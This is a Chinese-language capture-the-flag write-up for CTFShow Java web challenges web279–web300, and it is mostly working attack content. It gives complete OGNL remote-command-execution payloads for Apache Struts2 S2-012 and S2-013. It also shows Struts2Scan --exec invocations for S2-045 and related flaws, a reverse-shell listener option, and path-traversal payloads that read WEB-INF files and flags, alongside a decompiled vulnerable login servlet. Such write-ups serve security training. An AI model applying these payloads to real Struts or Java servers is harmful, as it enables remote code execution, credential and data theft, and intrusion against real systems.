Practice - CTFSHOW WEB入门 JAVA篇

web279-web283

脚本一键利用 https://github.com/wyzmgmdg/Struts2Scan

web284

Struts S2-012 漏洞利用,参考公开分析文章构造 OGNL payload。payload 执行 env 是因为这一系列题目的 flag 一般放在环境变量里;输出通过 HttpServletResponse 直接回显到页面。
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

web285

参考文章Struts-S2-013漏洞利用构造 payload,或利用工具 Struts2-Scan 一键利用。
payload: /S2-013/link.action?url=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D

web286-web288

用 Struts2Scan 的 --exec 执行命令;如果命令回显不完整,就改用反弹 shell 的方式获取完整输出。

web289

$ python .\Struts2Scan.py -u http://6cc667dc-21e1-47f6-bc20-7c86de46d293.challenge.ctf.show/S2-029/default.action?message=aaaaa -n S2-032 --exec
>> env

web290

$ python .\Struts2Scan.py -u http://472b9395-a127-4f0b-9dbc-c9d19bf93912.challenge.ctf.show/S2-032/memoshow.action?id=3 -n S2-045 --exec
>> env

web291

$ python .\Struts2Scan.py -u http://b7828e36-6040-474a-8d74-5b2e47e9d225.challenge.ctf.show/S2-033/orders -n S2-045 --exec
>> env

web292

$ python .\Struts2Scan.py -u http://36034b6f-491f-4b59-8281-ede2349302ff.challenge.ctf.show/S2-037/orders -n S2-045 --exec
>> env

web293

$ python .\Struts2Scan.py -u http://474f4f6b-8ae7-42c0-bb45-9e1cf63bd17a.challenge.ctf.show/S2-045/orders -n S2-045 --exec
>> env

web294

$ python .\Struts2Scan.py -u http://79931272-f07a-41a3-8608-ec19106644c3.challenge.ctf.show/S2-046/doUpload.action -n S2-046 --exec
>> env

工具可能提示该漏洞不存在,可以忽略这个提示,--exec 仍然能够执行命令。

web295

$ python .\Struts2Scan.py -u http://d8a2ded0-0c5d-4a17-846a-5ae627dd1468.challenge.ctf.show/S2-048/integration/saveGangster.action -d "name={exp}&age=11111&description=aaaa" -n S2-048 -lr x.x.x.x:9999

web296

$ python .\Struts2Scan.py -u http://770a3f17-692b-4558-aebe-838df182ff9c.challenge.ctf.show/S2-052/orders -n S2-045 --exec
>> env

web297

$ python .\Struts2Scan.py -u http://7545e434-5ce5-4cd7-8d62-2da3276d6cf3.challenge.ctf.show/S2-053/?name=VulApps -n S2-045 --exec
>> env

web298

jadx 反编译给的 war 包里面的 class。

package com.ctfshow.servlet;

import com.ctfshow.model.User;
import com.ctfshow.util.Util;
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Decompiled (jadx) from the challenge war. The listing is kept as-is because
// the defect below is the finding the challenge is built around; see comments.
public class loginServlet extends HttpServlet {
private static final long serialVersionUID = -3044593499093610703L;

// jadx renders a plain super.destroy() call as loginServlet.super.destroy().
public void destroy() {
loginServlet.super.destroy();
}

// Login over GET: credentials travel in the query string, so they end up in
// access logs, browser history and any proxy between client and server.
public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
response.setContentType("text/html");
PrintWriter out = response.getWriter();
String username = request.getParameter("username");
// Both parameters are passed through unchecked; a missing parameter is null,
// and User.getVipStatus() dereferences it (NullPointerException -> HTTP 500).
User user = new User(username, request.getParameter("password"));
// BUG: == compares object identity, not content. The parameter value is not
// the interned literal "admin", so this branch is effectively never taken and
// the intended "admin is blocked" check is dead code. This is why the payload
// username=admin&password=ctfshow works: control falls through to
// getVipStatus(), which does use equals() on the hard-coded credentials.
if (username == "admin") {
out.print("you are not admin");
} else if (user.getVipStatus()) {
out.print("you are login");
// Flag is read straight from /flag and written to the response.
out.print(Util.readFlag("/flag"));
} else {
out.print("login failed");
}
out.flush();
out.close();
}

public void init() throws ServletException {
}
}

user model

package com.ctfshow.model;

import java.io.Serializable;

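/**
 * Login model decompiled from the challenge war.
 *
 * The credential check is intentionally a hard-coded pair (that is the
 * challenge design); the only change from the decompiled original is that
 * {@link #getVipStatus()} is null-safe, so a request that omits a parameter
 * yields "login failed" instead of a NullPointerException.
 */
public class User implements Serializable {
    private static final long serialVersionUID = -4069265999830231626L;
    private Boolean isVip;
    private String password;
    private String username;

    public String getUsername() {
        return this.username;
    }

    public void setUsername(String username2) {
        this.username = username2;
    }

    public String getPassword() {
        return this.password;
    }

    public void setPassword(String password2) {
        this.password = password2;
    }

    // Accessor names keep the original "IvVip" typo: they are part of the
    // bean interface the rest of the application (and serialization) sees.
    public Boolean getIvVip() {
        return this.isVip;
    }

    public void setIvVip(Boolean ivVip) {
        this.isVip = ivVip;
    }

    /**
     * @param username2 raw request parameter, may be null
     * @param password2 raw request parameter, may be null
     */
    public User(String username2, String password2) {
        this.username = username2;
        this.password = password2;
    }

    /**
     * Returns true only for the hard-coded pair admin / ctfshow.
     *
     * Literal-first equals() is null-safe: a null field compares as a
     * mismatch rather than throwing. (A real login would compare against a
     * hashed store with a constant-time comparison; not relevant to the CTF.)
     */
    public boolean getVipStatus() {
        return "admin".equals(this.username) && "ctfshow".equals(this.password);
    }

    // Includes the cleartext password; do not log the result of this method.
    public String toString() {
        return "User [username=" + this.username + ", password=" + this.password + ", isVip=" + this.isVip + "]";
    }
}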

根据源码构造 payload: /ctfshow/login?username=admin&password=ctfshow。原因是 `username == "admin"` 用的是引用比较而不是 equals,请求参数不是字面量对象,这个判断基本永远为 false,"you are not admin" 的拦截形同虚设;于是直接走到 getVipStatus(),它用 equals 比较硬编码的 admin/ctfshow,匹配后输出 /flag。

web299

HTML 注释里有 /view-source?file=index.php,是一个任意文件读取点。用它读取 WEB-INF/web.xml,发现 servlet com.ctfshow.servlet.GetFlag;再读 WEB-INF/classes/com/ctfshow/servlet/GetFlag.class,其中含有 flag 路径 /fl3g;最后读 ../../../../../../fl3g 得到 flag。
尝试过读 class 下载进行反编译,无果。
payload: /view-source?file=../../../../../../fl3g

web300

同上题。
payload: /?file=../../../../../f1bg